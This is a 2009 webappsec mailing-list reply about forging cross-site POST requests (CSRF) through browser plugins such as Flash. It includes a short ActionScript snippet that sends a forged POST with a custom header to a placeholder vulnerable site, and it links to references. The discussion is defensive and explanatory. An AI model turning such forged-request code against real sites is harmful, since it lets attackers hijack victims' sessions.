[prev in list] [next in list] [prev in thread] [next in thread]
List: webappsec
Subject: Re: CSRF through POST
From: YGN Ethical Hacker Group <lists () yehg ! net>
Date: 2009-12-27 5:55:23
Message-ID: 875432850912262155u3836c59ag4ab56b1cb6654326 () mail ! gmail ! com
[Download RAW message or body]
You can forge HTTP Post using any feasible browser plugins such as
Flash (AS), SilverLight, Java Applet.
Flash is said to be a feasible way to take over victim's sessions via CSRF.
[flash]
var req:LoadVars=new LoadVars();
req.addRequestHeader("Foo","Bar");
req.decode("a=b&c=d");
req.send("http://www.vuln.site/some/page.cgi?p1=v1&p2=v2",
"_blank","POST");
[/flash]
http://www.shinedraw.com/data-handling/flash-vs-silverlight-simple-http-post-request/
http://www.securiteam.com/securityreviews/5KP0M1FJ5E.html
http://forums.sun.com/thread.jspa?threadID=645830
--
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic